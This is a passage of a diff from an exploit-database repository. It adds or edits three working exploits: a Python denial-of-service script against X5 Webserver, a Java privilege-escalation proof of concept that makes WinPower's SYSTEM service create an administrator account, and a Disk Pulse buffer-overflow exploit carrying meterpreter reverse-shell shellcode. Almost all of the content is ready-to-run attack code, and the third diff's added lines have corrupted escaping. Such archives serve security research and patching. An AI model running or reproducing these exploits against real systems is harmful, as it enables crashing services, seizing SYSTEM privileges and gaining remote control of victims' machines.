+# 00503ae0 8b02            mov     eax,dword ptr [edx]  ds:002b:00000000=????????
+# 0:004> kb
+#  # ChildEBP RetAddr  Args to Child              
+# WARNING: Stack unwind information not available. Following frames may be wrong.
+# 00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0
+# 01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6
+# 02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa
+# 03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1
+# 04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3
+# 05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293
+# 06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234
+# 07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe
+# 08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70
+# 09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b
+#
+# ----------------------------------------------------------------------------
+#
+# Tested on: Microsoft Windows XP Professional SP3 (EN)
+#            Microsoft Windows 7 Ultimate SP1 (EN)
+#
+#
+# Vulnerability discovered by Stefan Petrushevski aka sm - <stefan@zeroscience.mk>
+#
+#
+# Advisory ID: ZSL-2016-5377
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php
+#
+#
+# 15.11.2016
+#
+
+
+import sys, socket
+
+if len(sys.argv) < 3:
+	print '------- X5 Webserver 5.0a0 - Remote Denial of Service ------\n'
+	print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
+	print 'Example: ' + sys.argv[0] + ' 8.8.8.8 80\n'
+	print '------------------------------------------------------------\n'
+	sys.exit(0)
+
+host = sys.argv[1]
+port = int(sys.argv[2])
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect = s.connect((host, port))
+s.settimeout(666)
+payload = (
+'\x47\x45\x54\x20\x2f\x50\x52\x4e\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a'
+'\x48\x6f\x73\x74\x3a\x20\x31\x37\x32\x2e\x31\x39\x2e\x30\x2e\x32\x31\x35\x0d'
+'\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x5a\x53\x4c\x2d\x46\x75'
+'\x7a\x7a\x65\x72\x2d\x41\x67\x65\x6e\x74\x2f\x34\x2e\x30\x2e\x32\x38\x35\x20'
+'\x0d\x0a\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x78\x6d\x6c\x2c'
+'\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x2c\x61\x70\x70'
+'\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c'
+'\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x74\x65\x78'
+'\x74\x2f\x70\x6c\x61\x69\x6e\x3b\x71\x3d\x30\x2e\x38\x2c\x69\x6d\x61\x67\x65'
+'\x2f\x70\x6e\x67\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63'
+'\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x75\x73'
+'\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45'
+'\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x64\x65\x66\x6c\x61'
+'\x74\x65\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a'
+'\x20\x49\x53\x4f\x2d\x38\x38\x35\x39\x2d\x31\x2c\x75\x74\x66\x2d\x38\x3b\x71'
+'\x3d\x30\x2e\x37\x2c\x2a\x3b\x71\x3d\x30\x2e\x37\x0d\x0a\x4b\x65\x65\x70\x2d'
+'\x41\x6c\x69\x76\x65\x3a\x20\x33\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74'
+'\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x0d\x0a\x0d\x0a'
+)
+
+s.send(payload)
+s.close
+print 'BOOM! \n'

platforms/windows/local/40848.java

@@ -0,0 +1,157 @@
+# Exploit Title: WinPower V4.9.0.4 Privilege Escalation
+# Date: 29-11-2016
+# Software Link: http://www.ups-software-download.com/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: local
+ 
+1. Description
+
+UPSmonitor runs as SYSTEM process.
+
+We can communicate with monitor using RMI interface.
+
+In manager app there’s an “Administrator” password check, but the password isn’t verified inside monitor process.
+
+So we can modify any application settings without knowing administrator password.
+
+What is more interesting we can set command which will be executed when monitor get “remote shutdown command”.
+
+Because monitor runs as SYSTEM process, this command is also executed with SYSTEM privileges.
+
+So using this we can create new administrator account.
+
+http://security.szurek.pl/winpower-v4904-privilege-escalation.html
+
+2. Proof of Concept
+
+/*
+WinPower V4.9.0.4 Privilege Escalation
+Download: http://www.ups-software-download.com/
+by Kacper Szurek
+http://security.szurek.pl/
+*/
+import com.adventnet.snmp.snmp2.*;
+import java.io.*;
+import wprmi.SimpleRMIInterface;
+
+public class WinPowerExploit {
+    private static String command_path = System.getProperty("user.dir") + "\\command.bat";
+    private static String command_username = "wpexploit";
+
+    private static void send_snmp_packet(String IP, SnmpPDU sendPDU) throws SnmpException {
+        SnmpAPI api = new SnmpAPI();
+        api.setCharacterEncoding("UTF-8");
+        api.start();
+
+        SnmpSession session = new SnmpSession(api);
+        session.open();
+        session.setPeername(IP);
+        session.setRemotePort(2199);
+        session.send(sendPDU);
+    }
+
+    public static void sendShutdownCommand(String agentIP) throws SnmpException {
+        SnmpPDU pdu2 = new SnmpPDU();
+        pdu2.setCommand((byte) -92);
+        SnmpOID oid = new SnmpOID(".1.3.6.1.2.1.33.1.6.3.25.0");
+        pdu2.setEnterprise(oid);
+        byte dataType = 4;
+        SnmpVar var = SnmpVar.createVariable("", dataType);
+        SnmpVarBind varbind = new SnmpVarBind(oid, var);
+        pdu2.addVariableBinding(varbind);
+        send_snmp_packet(agentIP, pdu2);
+    }
+
+    private static void create_command_file() throws IOException {
+        Writer writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(command_path), "utf-8"));
+        writer.write("net user " + command_username + " /add\n");
+        writer.write("net localgroup administrators " + command_username + " /add\n");
+        writer.write("net stop UPSmonitor");
+        writer.close();
+    }
+
+    private static String exec_cmd(String cmd) throws java.io.IOException {
+        Process proc = Runtime.getRuntime().exec(cmd);
+        java.io.InputStream is = proc.getInputStream();
+        java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
+        String val = "";
+        if (s.hasNext()) {
+            val = s.next();
+        } else {
+            val = "";
+        }
+        return val;
+    }
+
+    private static boolean is_user_exist() throws IOException {
+        String output = exec_cmd("net user");
+        return output.contains(command_username);
+    }
+
+    public static void main(String[] args) {
+        try {
+            System.out.println("WinPower V4.9.0.4 Privilege Escalation");
+            System.out.println("by Kacper Szurek");
+            System.out.println("http://security.szurek.pl/");
+
+            String is_service_started = exec_cmd("sc query UPSmonitor");
+            if (!is_service_started.contains("RUNNING")) {
+                System.out.println("[-] Monitor service not running");
+                System.exit(0);
+            }
+
+            create_command_file();
+            System.out.println("[*] Create shutdown command: " + command_path);
+
+            wprmi.SimpleRMIInterface myServerObject = (SimpleRMIInterface) java.rmi.Naming.lookup("rmi://127.0.0.1:2099/SimpleRMIImpl");
+            String root_password = myServerObject.getDataString(29, 1304, -1, 0);
+            System.out.println("[+] Get root password: " + root_password);
+            System.out.println("[+] Enable running command on shutdown");
+            myServerObject.setData(29, 262, 1, "", -1L, 0);
+
+            System.out.println("[+] Set shutdown command path");
+            myServerObject.setData(29, 235, -1, command_path, -1L, 0);
+
+            System.out.println("[+] Set execution as SYSTEM");
+            myServerObject.setData(29, 203, 0, "", -1L, 0);
+
+            System.out.println("[+] Allow remote shutdown");
+            myServerObject.setData(29, 263, 1, "", -1L, 0);
+
+            System.out.println("[+] Add localhost as remote shutdown agent");
+            myServerObject.setData(29, 299, -1, "127.0.0.1 ", -1L, 0);
+
+            System.out.println("[+] Set delay to 999");
+            myServerObject.setData(29, 236, 999, "", -1L, 0);
+
+            System.out.println("[+] Send shutdown command");
+            sendShutdownCommand("127.0.0.1");
+
+            System.out.print("[+] Waiting for admin account creation");
+
+            int i = 0;
+            while (i < 15) {
+                if (is_user_exist()) {
+                    System.out.println("\n[+] Account created, now login as: " + command_username);
+                    System.exit(0);
+                    break;
+                } else {
+                    System.out.print(".");
+                    Thread.sleep(2000);
+                }
+                i += 1;
+            }
+
+            System.out.print("\n[-] Exploit failed, admin account not created");
+            System.exit(1);
+        } catch (Exception e) {
+            System.out.println("\n[-] Error: " + e.getMessage());
+        }
+    }
+}
+
+Compiled Exploit:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40848.class

platforms/windows/remote/40835.py

@@ -1,14 +1,14 @@
 #!/usr/bin/python
 
-print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow"
+print \"Disk Pulse Enterprise 9.1.16 Login Buffer Overflow\"
-print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+print \"Author: Tulpa / tulpa[at]tulpa-security[dot]com\"
 
 #Author website: www.tulpa-security.com
 #Author twitter: @tulpa_security
 
-#Exploit will land you NT AUTHORITY\SYSTEM
+#Exploit will land you NT AUTHORITY\\SYSTEM
 #You do not need to be authenticated, password below is garbage
-#Swop out IP, shellcode and remember to adjust '\x41' for bytes
+#Swop out IP, shellcode and remember to adjust \'\\x41\' for bytes
 #Tested on Windows 7 x86 Enterprise SP1
 
 #Vendor has been notified on multiple occasions
@@ -20,81 +20,81 @@ import socket
 import sys
 
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-connect=s.connect(('192.168.123.130',80))
+connect=s.connect((\'192.168.123.130\',80))
 
 
-#bad chars \x00\x0a\x0d\x26
+#bad chars \\x00\\x0a\\x0d\\x26
 
 
-#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
+#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b \'\\x00\\x0a\\x0d\\x26\' -f python --smallest
 
 #payload size 308
 
 
 
-buf =  ""
+buf =  \"\"
-buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
+buf += \"\\xdb\\xdc\\xb8\\x95\\x49\\x89\\x1d\\xd9\\x74\\x24\\xf4\\x5f\\x33\"
-buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
+buf += \"\\xc9\\xb1\\x47\\x31\\x47\\x18\\x83\\xc7\\x04\\x03\\x47\\x81\\xab\"
-buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
+buf += \"\\x7c\\xe1\\x41\\xa9\\x7f\\x1a\\x91\\xce\\xf6\\xff\\xa0\\xce\\x6d\"
-buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
+buf += \"\\x8b\\x92\\xfe\\xe6\\xd9\\x1e\\x74\\xaa\\xc9\\x95\\xf8\\x63\\xfd\"
-buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
+buf += \"\\x1e\\xb6\\x55\\x30\\x9f\\xeb\\xa6\\x53\\x23\\xf6\\xfa\\xb3\\x1a\"
-buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
+buf += \"\\x39\\x0f\\xb5\\x5b\\x24\\xe2\\xe7\\x34\\x22\\x51\\x18\\x31\\x7e\"
-buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
+buf += \"\\x6a\\x93\\x09\\x6e\\xea\\x40\\xd9\\x91\\xdb\\xd6\\x52\\xc8\\xfb\"
-buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
+buf += \"\\xd9\\xb7\\x60\\xb2\\xc1\\xd4\\x4d\\x0c\\x79\\x2e\\x39\\x8f\\xab\"
-buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
+buf += \"\\x7f\\xc2\\x3c\\x92\\xb0\\x31\\x3c\\xd2\\x76\\xaa\\x4b\\x2a\\x85\"
-buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
+buf += \"\\x57\\x4c\\xe9\\xf4\\x83\\xd9\\xea\\x5e\\x47\\x79\\xd7\\x5f\\x84\"
-buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
+buf += \"\\x1c\\x9c\\x53\\x61\\x6a\\xfa\\x77\\x74\\xbf\\x70\\x83\\xfd\\x3e\"
-buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
+buf += \"\\x57\\x02\\x45\\x65\\x73\\x4f\\x1d\\x04\\x22\\x35\\xf0\\x39\\x34\"
-buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
+buf += \"\\x96\\xad\\x9f\\x3e\\x3a\\xb9\\xad\\x1c\\x52\\x0e\\x9c\\x9e\\xa2\"
-buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
+buf += \"\\x18\\x97\\xed\\x90\\x87\\x03\\x7a\\x98\\x40\\x8a\\x7d\\xdf\\x7a\"
-buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
+buf += \"\\x6a\\x11\\x1e\\x85\\x8b\\x3b\\xe4\\xd1\\xdb\\x53\\xcd\\x59\\xb0\"
-buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
+buf += \"\\xa3\\xf2\\x8f\\x2d\\xa1\\x64\\xf0\\x1a\\xd2\\xf2\\x98\\x58\\x25\"
-buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
+buf += \"\\xeb\\x04\\xd4\\xc3\\x5b\\xe5\\xb6\\x5b\\x1b\\x55\\x77\\x0c\\xf3\"
-buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
+buf += \"\\xbf\\x78\\x73\\xe3\\xbf\\x52\\x1c\\x89\\x2f\\x0b\\x74\\x25\\xc9\"
-buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
+buf += \"\\x16\\x0e\\xd4\\x16\\x8d\\x6a\\xd6\\x9d\\x22\\x8a\\x98\\x55\\x4e\"
-buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
+buf += \"\\x98\\x4c\\x96\\x05\\xc2\\xda\\xa9\\xb3\\x69\\xe2\\x3f\\x38\\x38\"
-buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
+buf += \"\\xb5\\xd7\\x42\\x1d\\xf1\\x77\\xbc\\x48\\x8a\\xbe\\x28\\x33\\xe4\"
-buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
+buf += \"\\xbe\\xbc\\xb3\\xf4\\xe8\\xd6\\xb3\\x9c\\x4c\\x83\\xe7\\xb9\\x92\"
-buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
+buf += \"\\x1e\\x94\\x12\\x07\\xa1\\xcd\\xc7\\x80\\xc9\\xf3\\x3e\\xe6\\x55\"
-buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
+buf += \"\\x0b\\x15\\xf6\\xaa\\xda\\x53\\x8c\\xc2\\xde\"
 
 
 #pop pop ret 10015BFE
 
-nseh = "\x90\x90\xEB\x0B"
+nseh = \"\\x90\\x90\\xEB\\x0B\"
-seh = "\xFE\x5B\x01\x10"
+seh = \"\\xFE\\x5B\\x01\\x10\"
 
-egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"
-egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+egghunter += \"\\xef\\xb8\\x77\\x30\\x30\\x74\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"
 
-evil =  "POST /login HTTP/1.1\r\n"
+evil =  \"POST /login HTTP/1.1\\r\\n\"
-evil += "Host: 192.168.123.132\r\n"
+evil += \"Host: 192.168.123.132\\r\\n\"
-evil += "User-Agent: Mozilla/5.0\r\n"
+evil += \"User-Agent: Mozilla/5.0\\r\\n\"
-evil += "Connection: close\r\n"
+evil += \"Connection: close\\r\\n\"
-evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"
-evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += \"Accept-Language: en-us,en;q=0.5\\r\\n\"
-evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"
-evil += "Keep-Alive: 300\r\n"
+evil += \"Keep-Alive: 300\\r\\n\"
-evil += "Proxy-Connection: keep-alive\r\n"
+evil += \"Proxy-Connection: keep-alive\\r\\n\"
-evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"
-evil += "Content-Length: 17000\r\n\r\n"
+evil += \"Content-Length: 17000\\r\\n\\r\\n\"
-evil += "username=admin"
+evil += \"username=admin\"
-evil += "&password=aaaaa\r\n"
+evil += \"&password=aaaaa\\r\\n\"
-evil += "\x41" * 13664 #subtract/add for payload
+evil += \"\\x41\" * 13664 #subtract/add for payload
-evil += "B" * 100
+evil += \"B\" * 100
-evil += "w00tw00t"
+evil += \"w00tw00t\"
 evil += buf
-evil += "\x90" * 212
+evil += \"\\x90\" * 212
 evil += nseh
 evil += seh
-evil += "\x90" * 10
+evil += \"\\x90\" * 10
 evil += egghunter
-evil += "\x90" * 8672
+evil += \"\\x90\" * 8672
 
 
-print 'Sending evil buffer...'
+print \'Sending evil buffer...\'
 s.send(evil)
-print 'Payload Sent!'
+print \'Payload Sent!\'
 s.close()